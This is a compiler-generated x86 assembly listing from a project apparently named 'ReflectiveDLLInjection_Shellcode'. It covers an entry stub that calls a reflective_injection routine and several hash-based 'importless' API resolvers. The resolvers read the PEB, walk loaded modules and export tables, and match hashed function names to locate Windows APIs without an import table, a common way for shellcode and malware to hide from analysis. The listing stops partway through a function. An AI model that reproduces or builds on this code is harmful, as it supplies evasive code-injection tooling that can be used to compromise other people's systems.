; Listing generated by Microsoft (R) Optimizing Compiler Version 19.30.30709.0 

	TITLE	C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\main.obj
	.686P
	.XMM
	include listing.inc
	.model	flat

assume fs:nothing
PUBLIC	?hash_str@importless_api@@YAIPBDI@Z		; importless_api::hash_str
PUBLIC	?caller@@YAKXZ					; caller
PUBLIC	?reflective_injection@@YAHXZ			; reflective_injection
PUBLIC	?peb@?$importless_api@$0GIBEHPNM@@importless_api@@AAEPBUPEB_T@win@2@XZ ; importless_api::importless_api<1746173916>::peb
PUBLIC	??0?$importless_api@$0GIBEHPNM@@importless_api@@QAE@XZ ; importless_api::importless_api<1746173916>::importless_api<1746173916>
PUBLIC	?get_function@?$importless_api@$0GIBEHPNM@@importless_api@@QAEPAXXZ ; importless_api::importless_api<1746173916>::get_function
PUBLIC	?peb@?$importless_api@$0FCDEOHLE@@importless_api@@AAEPBUPEB_T@win@2@XZ ; importless_api::importless_api<1379198900>::peb
PUBLIC	??0?$importless_api@$0FCDEOHLE@@importless_api@@QAE@XZ ; importless_api::importless_api<1379198900>::importless_api<1379198900>
PUBLIC	?get_function@?$importless_api@$0FCDEOHLE@@importless_api@@QAEPAXXZ ; importless_api::importless_api<1379198900>::get_function
PUBLIC	?peb@?$importless_api@$0BPALGAN@@importless_api@@AAEPBUPEB_T@win@2@XZ ; importless_api::importless_api<32552461>::peb
PUBLIC	??0?$importless_api@$0BPALGAN@@importless_api@@QAE@XZ ; importless_api::importless_api<32552461>::importless_api<32552461>
PUBLIC	?get_function@?$importless_api@$0BPALGAN@@importless_api@@QAEPAXXZ ; importless_api::importless_api<32552461>::get_function
PUBLIC	?peb@?$importless_api@$0OKDBEOND@@importless_api@@AAEPBUPEB_T@win@2@XZ ; importless_api::importless_api<3929099987>::peb
PUBLIC	??0?$importless_api@$0OKDBEOND@@importless_api@@QAE@XZ ; importless_api::importless_api<3929099987>::importless_api<3929099987>
PUBLIC	?get_function@?$importless_api@$0OKDBEOND@@importless_api@@QAEPAXXZ ; importless_api::importless_api<3929099987>::get_function
PUBLIC	_main
PUBLIC	??0?$importless_api@$0PBKAJNIB@@importless_api@@QAE@XZ ; importless_api::importless_api<4053835137>::importless_api<4053835137>
PUBLIC	?get_hash@?$importless_api@$0PBKAJNIB@@importless_api@@QAEIXZ ; importless_api::importless_api<4053835137>::get_hash
; Function compile flags: /Odtp
;	COMDAT ?get_hash@?$importless_api@$0PBKAJNIB@@importless_api@@QAEIXZ
_TEXT	SEGMENT

AlignRSP PROC
    push esi ; Preserve RSI since we're stomping on it
	mov esi, esp ; Save the value of RSP so it can be restored
	and esp, 0FFFFFFF8h ; Align RSP to 8 byte
	sub esp, 020h ; Allocate homing space for ExecutePayload
	call _main ; Call the entry point of the payload
	mov esp, esi ; Restore the original value of RSP
	pop esi ; Restore RSI
	ret
AlignRSP ENDP

_this$ = -4						; size = 4
?get_hash@?$importless_api@$0PBKAJNIB@@importless_api@@QAEIXZ PROC ; importless_api::importless_api<4053835137>::get_hash, COMDAT
; _this$ = ecx
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 241
	push	ebp
	mov	ebp, esp
	push	ecx
	mov	DWORD PTR _this$[ebp], ecx
; Line 242
	mov	eax, -241132159				; f1a09d81H
; Line 243
	mov	esp, ebp
	pop	ebp
	ret	0
?get_hash@?$importless_api@$0PBKAJNIB@@importless_api@@QAEIXZ ENDP ; importless_api::importless_api<4053835137>::get_hash
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ??0?$importless_api@$0PBKAJNIB@@importless_api@@QAE@XZ
_TEXT	SEGMENT
_this$ = -4						; size = 4
??0?$importless_api@$0PBKAJNIB@@importless_api@@QAE@XZ PROC ; importless_api::importless_api<4053835137>::importless_api<4053835137>, COMDAT
; _this$ = ecx
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 235
	push	ebp
	mov	ebp, esp
	push	ecx
	mov	DWORD PTR _this$[ebp], ecx
; Line 237
	mov	eax, DWORD PTR _this$[ebp]
	mov	DWORD PTR [eax], -241132159		; f1a09d81H
; Line 238
	mov	eax, DWORD PTR _this$[ebp]
	mov	esp, ebp
	pop	ebp
	ret	0
??0?$importless_api@$0PBKAJNIB@@importless_api@@QAE@XZ ENDP ; importless_api::importless_api<4053835137>::importless_api<4053835137>
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
_main	PROC
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\main.cpp
; Line 294
	push	ebp
	mov	ebp, esp
; Line 295
	call	?reflective_injection@@YAHXZ		; reflective_injection
; Line 296
	xor	eax, eax
	pop	ebp
	ret	0
_main	ENDP
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?get_function@?$importless_api@$0OKDBEOND@@importless_api@@QAEPAXXZ
_TEXT	SEGMENT
$T1 = -52						; size = 4
_dwFuncRVA$2 = -48					; size = 4
_pAddressesPointers$3 = -44				; size = 4
_func_hash$4 = -40					; size = 4
_hImageDosHeader$5 = -36				; size = 4
_this$ = -32						; size = 4
_hImageNtHeaders$6 = -28				; size = 4
_pOrdinalPointers$7 = -24				; size = 4
_pNamePointers$8 = -20					; size = 4
_i$9 = -16						; size = 4
_curr_module$ = -12					; size = 4
_hImageExportDirectory$10 = -8				; size = 4
_hBase$11 = -4						; size = 4
?get_function@?$importless_api@$0OKDBEOND@@importless_api@@QAEPAXXZ PROC ; importless_api::importless_api<3929099987>::get_function, COMDAT
; _this$ = ecx
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 247
	push	ebp
	mov	ebp, esp
	sub	esp, 52					; 00000034H
	mov	DWORD PTR _this$[ebp], ecx
; Line 248
	mov	ecx, DWORD PTR _this$[ebp]
	call	?peb@?$importless_api@$0OKDBEOND@@importless_api@@AAEPBUPEB_T@win@2@XZ ; importless_api::importless_api<3929099987>::peb
	mov	eax, DWORD PTR [eax+12]
	mov	ecx, DWORD PTR [eax+12]
	mov	DWORD PTR _curr_module$[ebp], ecx
$LN2@get_functi:
; Line 251
	mov	edx, DWORD PTR _curr_module$[ebp]
	cmp	DWORD PTR [edx+48], 0
	je	$LN3@get_functi
; Line 252
	mov	eax, DWORD PTR _curr_module$[ebp]
	mov	ecx, DWORD PTR [eax+24]
	mov	DWORD PTR _hBase$11[ebp], ecx
; Line 255
	mov	edx, DWORD PTR _hBase$11[ebp]
	mov	DWORD PTR _hImageDosHeader$5[ebp], edx
; Line 256
	mov	eax, DWORD PTR _hImageDosHeader$5[ebp]
	mov	ecx, DWORD PTR _hBase$11[ebp]
	add	ecx, DWORD PTR [eax+60]
	mov	DWORD PTR _hImageNtHeaders$6[ebp], ecx
; Line 259
	mov	edx, 8
	imul	eax, edx, 0
	mov	ecx, DWORD PTR _hImageNtHeaders$6[ebp]
	cmp	DWORD PTR [ecx+eax+120], 0
	je	$LN7@get_functi
; Line 261
	mov	edx, 8
	imul	eax, edx, 0
	mov	ecx, DWORD PTR _hImageNtHeaders$6[ebp]
	mov	edx, DWORD PTR _hBase$11[ebp]
	add	edx, DWORD PTR [ecx+eax+120]
	mov	DWORD PTR _hImageExportDirectory$10[ebp], edx
; Line 263
	mov	eax, DWORD PTR _hImageExportDirectory$10[ebp]
	mov	ecx, DWORD PTR _hBase$11[ebp]
	add	ecx, DWORD PTR [eax+32]
	mov	DWORD PTR _pNamePointers$8[ebp], ecx
; Line 264
	mov	edx, DWORD PTR _hImageExportDirectory$10[ebp]
	mov	eax, DWORD PTR _hBase$11[ebp]
	add	eax, DWORD PTR [edx+36]
	mov	DWORD PTR _pOrdinalPointers$7[ebp], eax
; Line 265
	mov	ecx, DWORD PTR _hImageExportDirectory$10[ebp]
	mov	edx, DWORD PTR _hBase$11[ebp]
	add	edx, DWORD PTR [ecx+28]
	mov	DWORD PTR _pAddressesPointers$3[ebp], edx
; Line 268
	mov	DWORD PTR _i$9[ebp], 0
	jmp	SHORT $LN6@get_functi
$LN4@get_functi:
	mov	eax, DWORD PTR _i$9[ebp]
	add	eax, 1
	mov	DWORD PTR _i$9[ebp], eax
	mov	ecx, DWORD PTR _pNamePointers$8[ebp]
	add	ecx, 4
	mov	DWORD PTR _pNamePointers$8[ebp], ecx
	mov	edx, DWORD PTR _pOrdinalPointers$7[ebp]
	add	edx, 2
	mov	DWORD PTR _pOrdinalPointers$7[ebp], edx
$LN6@get_functi:
	mov	eax, DWORD PTR _hImageExportDirectory$10[ebp]
	mov	ecx, DWORD PTR _i$9[ebp]
	cmp	ecx, DWORD PTR [eax+24]
	jae	SHORT $LN7@get_functi
; Line 270
	lea	ecx, DWORD PTR $T1[ebp]
	call	??0?$importless_api@$0PBKAJNIB@@importless_api@@QAE@XZ ; importless_api::importless_api<4053835137>::importless_api<4053835137>
	mov	ecx, eax
	call	?get_hash@?$importless_api@$0PBKAJNIB@@importless_api@@QAEIXZ ; importless_api::importless_api<4053835137>::get_hash
	push	eax
	mov	edx, DWORD PTR _pNamePointers$8[ebp]
	mov	eax, DWORD PTR _hBase$11[ebp]
	add	eax, DWORD PTR [edx]
	push	eax
	call	?hash_str@importless_api@@YAIPBDI@Z	; importless_api::hash_str
	add	esp, 8
	mov	DWORD PTR _func_hash$4[ebp], eax
; Line 271
	cmp	DWORD PTR _func_hash$4[ebp], -365867309	; ea314ed3H
	jne	SHORT $LN8@get_functi
; Line 273
	mov	ecx, DWORD PTR _pOrdinalPointers$7[ebp]
	movzx	edx, WORD PTR [ecx]
	mov	eax, DWORD PTR _pAddressesPointers$3[ebp]
	mov	ecx, DWORD PTR [eax+edx*4]
	mov	DWORD PTR _dwFuncRVA$2[ebp], ecx
; Line 276
	mov	eax, DWORD PTR _hBase$11[ebp]
	add	eax, DWORD PTR _dwFuncRVA$2[ebp]
	jmp	SHORT $LN1@get_functi
$LN8@get_functi:
; Line 278
	jmp	SHORT $LN4@get_functi
$LN7@get_functi:
; Line 281
	mov	edx, DWORD PTR _curr_module$[ebp]
	mov	eax, DWORD PTR [edx]
	mov	DWORD PTR _curr_module$[ebp], eax
; Line 282
	jmp	$LN2@get_functi
$LN3@get_functi:
; Line 284
	xor	eax, eax
$LN1@get_functi:
; Line 285
	mov	esp, ebp
	pop	ebp
	ret	0
?get_function@?$importless_api@$0OKDBEOND@@importless_api@@QAEPAXXZ ENDP ; importless_api::importless_api<3929099987>::get_function
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ??0?$importless_api@$0OKDBEOND@@importless_api@@QAE@XZ
_TEXT	SEGMENT
_this$ = -4						; size = 4
??0?$importless_api@$0OKDBEOND@@importless_api@@QAE@XZ PROC ; importless_api::importless_api<3929099987>::importless_api<3929099987>, COMDAT
; _this$ = ecx
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 235
	push	ebp
	mov	ebp, esp
	push	ecx
	mov	DWORD PTR _this$[ebp], ecx
; Line 237
	mov	eax, DWORD PTR _this$[ebp]
	mov	DWORD PTR [eax], -365867309		; ea314ed3H
; Line 238
	mov	eax, DWORD PTR _this$[ebp]
	mov	esp, ebp
	pop	ebp
	ret	0
??0?$importless_api@$0OKDBEOND@@importless_api@@QAE@XZ ENDP ; importless_api::importless_api<3929099987>::importless_api<3929099987>
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?peb@?$importless_api@$0OKDBEOND@@importless_api@@AAEPBUPEB_T@win@2@XZ
_TEXT	SEGMENT
_this$ = -4						; size = 4
?peb@?$importless_api@$0OKDBEOND@@importless_api@@AAEPBUPEB_T@win@2@XZ PROC ; importless_api::importless_api<3929099987>::peb, COMDAT
; _this$ = ecx
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 213
	push	ebp
	mov	ebp, esp
	push	ecx
	mov	DWORD PTR _this$[ebp], ecx
; Line 217
	mov	eax, DWORD PTR fs:48
; Line 227
	mov	esp, ebp
	pop	ebp
	ret	0
?peb@?$importless_api@$0OKDBEOND@@importless_api@@AAEPBUPEB_T@win@2@XZ ENDP ; importless_api::importless_api<3929099987>::peb
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?get_function@?$importless_api@$0BPALGAN@@importless_api@@QAEPAXXZ
_TEXT	SEGMENT
$T1 = -52						; size = 4
_dwFuncRVA$2 = -48					; size = 4
_pAddressesPointers$3 = -44				; size = 4
_func_hash$4 = -40					; size = 4
_hImageDosHeader$5 = -36				; size = 4
_this$ = -32						; size = 4
_hImageNtHeaders$6 = -28				; size = 4
_pOrdinalPointers$7 = -24				; size = 4
_pNamePointers$8 = -20					; size = 4
_i$9 = -16						; size = 4
_curr_module$ = -12					; size = 4
_hImageExportDirectory$10 = -8				; size = 4
_hBase$11 = -4						; size = 4
?get_function@?$importless_api@$0BPALGAN@@importless_api@@QAEPAXXZ PROC ; importless_api::importless_api<32552461>::get_function, COMDAT
; _this$ = ecx
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 247
	push	ebp
	mov	ebp, esp
	sub	esp, 52					; 00000034H
	mov	DWORD PTR _this$[ebp], ecx
; Line 248
	mov	ecx, DWORD PTR _this$[ebp]
	call	?peb@?$importless_api@$0BPALGAN@@importless_api@@AAEPBUPEB_T@win@2@XZ ; importless_api::importless_api<32552461>::peb
	mov	eax, DWORD PTR [eax+12]
	mov	ecx, DWORD PTR [eax+12]
	mov	DWORD PTR _curr_module$[ebp], ecx
$LN2@get_functi:
; Line 251
	mov	edx, DWORD PTR _curr_module$[ebp]
	cmp	DWORD PTR [edx+48], 0
	je	$LN3@get_functi
; Line 252
	mov	eax, DWORD PTR _curr_module$[ebp]
	mov	ecx, DWORD PTR [eax+24]
	mov	DWORD PTR _hBase$11[ebp], ecx
; Line 255
	mov	edx, DWORD PTR _hBase$11[ebp]
	mov	DWORD PTR _hImageDosHeader$5[ebp], edx
; Line 256
	mov	eax, DWORD PTR _hImageDosHeader$5[ebp]
	mov	ecx, DWORD PTR _hBase$11[ebp]
	add	ecx, DWORD PTR [eax+60]
	mov	DWORD PTR _hImageNtHeaders$6[ebp], ecx
; Line 259
	mov	edx, 8
	imul	eax, edx, 0
	mov	ecx, DWORD PTR _hImageNtHeaders$6[ebp]
	cmp	DWORD PTR [ecx+eax+120], 0
	je	$LN7@get_functi
; Line 261
	mov	edx, 8
	imul	eax, edx, 0
	mov	ecx, DWORD PTR _hImageNtHeaders$6[ebp]
	mov	edx, DWORD PTR _hBase$11[ebp]
	add	edx, DWORD PTR [ecx+eax+120]
	mov	DWORD PTR _hImageExportDirectory$10[ebp], edx
; Line 263
	mov	eax, DWORD PTR _hImageExportDirectory$10[ebp]
	mov	ecx, DWORD PTR _hBase$11[ebp]
	add	ecx, DWORD PTR [eax+32]
	mov	DWORD PTR _pNamePointers$8[ebp], ecx
; Line 264
	mov	edx, DWORD PTR _hImageExportDirectory$10[ebp]
	mov	eax, DWORD PTR _hBase$11[ebp]
	add	eax, DWORD PTR [edx+36]
	mov	DWORD PTR _pOrdinalPointers$7[ebp], eax
; Line 265
	mov	ecx, DWORD PTR _hImageExportDirectory$10[ebp]
	mov	edx, DWORD PTR _hBase$11[ebp]
	add	edx, DWORD PTR [ecx+28]
	mov	DWORD PTR _pAddressesPointers$3[ebp], edx
; Line 268
	mov	DWORD PTR _i$9[ebp], 0
	jmp	SHORT $LN6@get_functi
$LN4@get_functi:
	mov	eax, DWORD PTR _i$9[ebp]
	add	eax, 1
	mov	DWORD PTR _i$9[ebp], eax
	mov	ecx, DWORD PTR _pNamePointers$8[ebp]
	add	ecx, 4
	mov	DWORD PTR _pNamePointers$8[ebp], ecx
	mov	edx, DWORD PTR _pOrdinalPointers$7[ebp]
	add	edx, 2
	mov	DWORD PTR _pOrdinalPointers$7[ebp], edx
$LN6@get_functi:
	mov	eax, DWORD PTR _hImageExportDirectory$10[ebp]
	mov	ecx, DWORD PTR _i$9[ebp]
	cmp	ecx, DWORD PTR [eax+24]
	jae	SHORT $LN7@get_functi
; Line 270
	lea	ecx, DWORD PTR $T1[ebp]
	call	??0?$importless_api@$0PBKAJNIB@@importless_api@@QAE@XZ ; importless_api::importless_api<4053835137>::importless_api<4053835137>
	mov	ecx, eax
	call	?get_hash@?$importless_api@$0PBKAJNIB@@importless_api@@QAEIXZ ; importless_api::importless_api<4053835137>::get_hash
	push	eax
	mov	edx, DWORD PTR _pNamePointers$8[ebp]
	mov	eax, DWORD PTR _hBase$11[ebp]
	add	eax, DWORD PTR [edx]
	push	eax
	call	?hash_str@importless_api@@YAIPBDI@Z	; importless_api::hash_str
	add	esp, 8
	mov	DWORD PTR _func_hash$4[ebp], eax
; Line 271
	cmp	DWORD PTR _func_hash$4[ebp], 32552461	; 01f0b60dH
	jne	SHORT $LN8@get_functi
; Line 273
	mov	ecx, DWORD PTR _pOrdinalPointers$7[ebp]
	movzx	edx, WORD PTR [ecx]
	mov	eax, DWORD PTR _pAddressesPointers$3[ebp]
	mov	ecx, DWORD PTR [eax+edx*4]
	mov	DWORD PTR _dwFuncRVA$2[ebp], ecx
; Line 276
	mov	eax, DWORD PTR _hBase$11[ebp]
	add	eax, DWORD PTR _dwFuncRVA$2[ebp]
	jmp	SHORT $LN1@get_functi
$LN8@get_functi:
; Line 278
	jmp	SHORT $LN4@get_functi
$LN7@get_functi:
; Line 281
	mov	edx, DWORD PTR _curr_module$[ebp]
	mov	eax, DWORD PTR [edx]
	mov	DWORD PTR _curr_module$[ebp], eax
; Line 282
	jmp	$LN2@get_functi
$LN3@get_functi:
; Line 284
	xor	eax, eax
$LN1@get_functi:
; Line 285
	mov	esp, ebp
	pop	ebp
	ret	0
?get_function@?$importless_api@$0BPALGAN@@importless_api@@QAEPAXXZ ENDP ; importless_api::importless_api<32552461>::get_function
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ??0?$importless_api@$0BPALGAN@@importless_api@@QAE@XZ
_TEXT	SEGMENT
_this$ = -4						; size = 4
??0?$importless_api@$0BPALGAN@@importless_api@@QAE@XZ PROC ; importless_api::importless_api<32552461>::importless_api<32552461>, COMDAT
; _this$ = ecx
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 235
	push	ebp
	mov	ebp, esp
	push	ecx
	mov	DWORD PTR _this$[ebp], ecx
; Line 237
	mov	eax, DWORD PTR _this$[ebp]
	mov	DWORD PTR [eax], 32552461		; 01f0b60dH
; Line 238
	mov	eax, DWORD PTR _this$[ebp]
	mov	esp, ebp
	pop	ebp
	ret	0
??0?$importless_api@$0BPALGAN@@importless_api@@QAE@XZ ENDP ; importless_api::importless_api<32552461>::importless_api<32552461>
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?peb@?$importless_api@$0BPALGAN@@importless_api@@AAEPBUPEB_T@win@2@XZ
_TEXT	SEGMENT
_this$ = -4						; size = 4
?peb@?$importless_api@$0BPALGAN@@importless_api@@AAEPBUPEB_T@win@2@XZ PROC ; importless_api::importless_api<32552461>::peb, COMDAT
; _this$ = ecx
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 213
	push	ebp
	mov	ebp, esp
	push	ecx
	mov	DWORD PTR _this$[ebp], ecx
; Line 217
	mov	eax, DWORD PTR fs:48
; Line 227
	mov	esp, ebp
	pop	ebp
	ret	0
?peb@?$importless_api@$0BPALGAN@@importless_api@@AAEPBUPEB_T@win@2@XZ ENDP ; importless_api::importless_api<32552461>::peb
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?get_function@?$importless_api@$0FCDEOHLE@@importless_api@@QAEPAXXZ
_TEXT	SEGMENT
$T1 = -52						; size = 4
_dwFuncRVA$2 = -48					; size = 4
_pAddressesPointers$3 = -44				; size = 4
_func_hash$4 = -40					; size = 4
_hImageDosHeader$5 = -36				; size = 4
_this$ = -32						; size = 4
_hImageNtHeaders$6 = -28				; size = 4
_pOrdinalPointers$7 = -24				; size = 4
_pNamePointers$8 = -20					; size = 4
_i$9 = -16						; size = 4
_curr_module$ = -12					; size = 4
_hImageExportDirectory$10 = -8				; size = 4
_hBase$11 = -4						; size = 4
?get_function@?$importless_api@$0FCDEOHLE@@importless_api@@QAEPAXXZ PROC ; importless_api::importless_api<1379198900>::get_function, COMDAT
; _this$ = ecx
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 247
	push	ebp
	mov	ebp, esp
	sub	esp, 52					; 00000034H
	mov	DWORD PTR _this$[ebp], ecx
; Line 248
	mov	ecx, DWORD PTR _this$[ebp]
	call	?peb@?$importless_api@$0FCDEOHLE@@importless_api@@AAEPBUPEB_T@win@2@XZ ; importless_api::importless_api<1379198900>::peb
	mov	eax, DWORD PTR [eax+12]
	mov	ecx, DWORD PTR [eax+12]
	mov	DWORD PTR _curr_module$[ebp], ecx
$LN2@get_functi:
; Line 251
	mov	edx, DWORD PTR _curr_module$[ebp]
	cmp	DWORD PTR [edx+48], 0
	je	$LN3@get_functi
; Line 252
	mov	eax, DWORD PTR _curr_module$[ebp]
	mov	ecx, DWORD PTR [eax+24]
	mov	DWORD PTR _hBase$11[ebp], ecx
; Line 255
	mov	edx, DWORD PTR _hBase$11[ebp]
	mov	DWORD PTR _hImageDosHeader$5[ebp], edx
; Line 256
	mov	eax, DWORD PTR _hImageDosHeader$5[ebp]
	mov	ecx, DWORD PTR _hBase$11[ebp]
	add	ecx, DWORD PTR [eax+60]
	mov	DWORD PTR _hImageNtHeaders$6[ebp], ecx
; Line 259
	mov	edx, 8
	imul	eax, edx, 0
	mov	ecx, DWORD PTR _hImageNtHeaders$6[ebp]
	cmp	DWORD PTR [ecx+eax+120], 0
	je	$LN7@get_functi
; Line 261
	mov	edx, 8
	imul	eax, edx, 0
	mov	ecx, DWORD PTR _hImageNtHeaders$6[ebp]
	mov	edx, DWORD PTR _hBase$11[ebp]
	add	edx, DWORD PTR [ecx+eax+120]
	mov	DWORD PTR _hImageExportDirectory$10[ebp], edx
; Line 263
	mov	eax, DWORD PTR _hImageExportDirectory$10[ebp]
	mov	ecx, DWORD PTR _hBase$11[ebp]
	add	ecx, DWORD PTR [eax+32]
	mov	DWORD PTR _pNamePointers$8[ebp], ecx
; Line 264
	mov	edx, DWORD PTR _hImageExportDirectory$10[ebp]
	mov	eax, DWORD PTR _hBase$11[ebp]
	add	eax, DWORD PTR [edx+36]
	mov	DWORD PTR _pOrdinalPointers$7[ebp], eax
; Line 265
	mov	ecx, DWORD PTR _hImageExportDirectory$10[ebp]
	mov	edx, DWORD PTR _hBase$11[ebp]
	add	edx, DWORD PTR [ecx+28]
	mov	DWORD PTR _pAddressesPointers$3[ebp], edx
; Line 268
	mov	DWORD PTR _i$9[ebp], 0
	jmp	SHORT $LN6@get_functi
$LN4@get_functi:
	mov	eax, DWORD PTR _i$9[ebp]
	add	eax, 1
	mov	DWORD PTR _i$9[ebp], eax
	mov	ecx, DWORD PTR _pNamePointers$8[ebp]
	add	ecx, 4
	mov	DWORD PTR _pNamePointers$8[ebp], ecx
	mov	edx, DWORD PTR _pOrdinalPointers$7[ebp]
	add	edx, 2
	mov	DWORD PTR _pOrdinalPointers$7[ebp], edx
$LN6@get_functi:
	mov	eax, DWORD PTR _hImageExportDirectory$10[ebp]
	mov	ecx, DWORD PTR _i$9[ebp]
	cmp	ecx, DWORD PTR [eax+24]
	jae	SHORT $LN7@get_functi
; Line 270
	lea	ecx, DWORD PTR $T1[ebp]
	call	??0?$importless_api@$0PBKAJNIB@@importless_api@@QAE@XZ ; importless_api::importless_api<4053835137>::importless_api<4053835137>
	mov	ecx, eax
	call	?get_hash@?$importless_api@$0PBKAJNIB@@importless_api@@QAEIXZ ; importless_api::importless_api<4053835137>::get_hash
	push	eax
	mov	edx, DWORD PTR _pNamePointers$8[ebp]
	mov	eax, DWORD PTR _hBase$11[ebp]
	add	eax, DWORD PTR [edx]
	push	eax
	call	?hash_str@importless_api@@YAIPBDI@Z	; importless_api::hash_str
	add	esp, 8
	mov	DWORD PTR _func_hash$4[ebp], eax
; Line 271
	cmp	DWORD PTR _func_hash$4[ebp], 1379198900	; 5234e7b4H
	jne	SHORT $LN8@get_functi
; Line 273
	mov	ecx, DWORD PTR _pOrdinalPointers$7[ebp]
	movzx	edx, WORD PTR [ecx]
	mov	eax, DWORD PTR _pAddressesPointers$3[ebp]
	mov	ecx, DWORD PTR [eax+edx*4]
	mov	DWORD PTR _dwFuncRVA$2[ebp], ecx
; Line 276
	mov	eax, DWORD PTR _hBase$11[ebp]
	add	eax, DWORD PTR _dwFuncRVA$2[ebp]
	jmp	SHORT $LN1@get_functi
$LN8@get_functi:
; Line 278
	jmp	SHORT $LN4@get_functi
$LN7@get_functi:
; Line 281
	mov	edx, DWORD PTR _curr_module$[ebp]
	mov	eax, DWORD PTR [edx]
	mov	DWORD PTR _curr_module$[ebp], eax
; Line 282
	jmp	$LN2@get_functi
$LN3@get_functi:
; Line 284
	xor	eax, eax
$LN1@get_functi:
; Line 285
	mov	esp, ebp
	pop	ebp
	ret	0
?get_function@?$importless_api@$0FCDEOHLE@@importless_api@@QAEPAXXZ ENDP ; importless_api::importless_api<1379198900>::get_function
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ??0?$importless_api@$0FCDEOHLE@@importless_api@@QAE@XZ
_TEXT	SEGMENT
_this$ = -4						; size = 4
??0?$importless_api@$0FCDEOHLE@@importless_api@@QAE@XZ PROC ; importless_api::importless_api<1379198900>::importless_api<1379198900>, COMDAT
; _this$ = ecx
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 235
	push	ebp
	mov	ebp, esp
	push	ecx
	mov	DWORD PTR _this$[ebp], ecx
; Line 237
	mov	eax, DWORD PTR _this$[ebp]
	mov	DWORD PTR [eax], 1379198900		; 5234e7b4H
; Line 238
	mov	eax, DWORD PTR _this$[ebp]
	mov	esp, ebp
	pop	ebp
	ret	0
??0?$importless_api@$0FCDEOHLE@@importless_api@@QAE@XZ ENDP ; importless_api::importless_api<1379198900>::importless_api<1379198900>
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?peb@?$importless_api@$0FCDEOHLE@@importless_api@@AAEPBUPEB_T@win@2@XZ
_TEXT	SEGMENT
_this$ = -4						; size = 4
?peb@?$importless_api@$0FCDEOHLE@@importless_api@@AAEPBUPEB_T@win@2@XZ PROC ; importless_api::importless_api<1379198900>::peb, COMDAT
; _this$ = ecx
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 213
	push	ebp
	mov	ebp, esp
	push	ecx
	mov	DWORD PTR _this$[ebp], ecx
; Line 217
	mov	eax, DWORD PTR fs:48
; Line 227
	mov	esp, ebp
	pop	ebp
	ret	0
?peb@?$importless_api@$0FCDEOHLE@@importless_api@@AAEPBUPEB_T@win@2@XZ ENDP ; importless_api::importless_api<1379198900>::peb
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?get_function@?$importless_api@$0GIBEHPNM@@importless_api@@QAEPAXXZ
_TEXT	SEGMENT
$T1 = -52						; size = 4
_dwFuncRVA$2 = -48					; size = 4
_pAddressesPointers$3 = -44				; size = 4
_func_hash$4 = -40					; size = 4
_hImageDosHeader$5 = -36				; size = 4
_this$ = -32						; size = 4
_hImageNtHeaders$6 = -28				; size = 4
_pOrdinalPointers$7 = -24				; size = 4
_pNamePointers$8 = -20					; size = 4
_i$9 = -16						; size = 4
_curr_module$ = -12					; size = 4
_hImageExportDirectory$10 = -8				; size = 4
_hBase$11 = -4						; size = 4
?get_function@?$importless_api@$0GIBEHPNM@@importless_api@@QAEPAXXZ PROC ; importless_api::importless_api<1746173916>::get_function, COMDAT
; _this$ = ecx
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 247
	push	ebp
	mov	ebp, esp
	sub	esp, 52					; 00000034H
	mov	DWORD PTR _this$[ebp], ecx
; Line 248
	mov	ecx, DWORD PTR _this$[ebp]
	call	?peb@?$importless_api@$0GIBEHPNM@@importless_api@@AAEPBUPEB_T@win@2@XZ ; importless_api::importless_api<1746173916>::peb
	mov	eax, DWORD PTR [eax+12]
	mov	ecx, DWORD PTR [eax+12]
	mov	DWORD PTR _curr_module$[ebp], ecx
$LN2@get_functi:
; Line 251
	mov	edx, DWORD PTR _curr_module$[ebp]
	cmp	DWORD PTR [edx+48], 0
	je	$LN3@get_functi
; Line 252
	mov	eax, DWORD PTR _curr_module$[ebp]
	mov	ecx, DWORD PTR [eax+24]
	mov	DWORD PTR _hBase$11[ebp], ecx
; Line 255
	mov	edx, DWORD PTR _hBase$11[ebp]
	mov	DWORD PTR _hImageDosHeader$5[ebp], edx
; Line 256
	mov	eax, DWORD PTR _hImageDosHeader$5[ebp]
	mov	ecx, DWORD PTR _hBase$11[ebp]
	add	ecx, DWORD PTR [eax+60]
	mov	DWORD PTR _hImageNtHeaders$6[ebp], ecx
; Line 259
	mov	edx, 8
	imul	eax, edx, 0
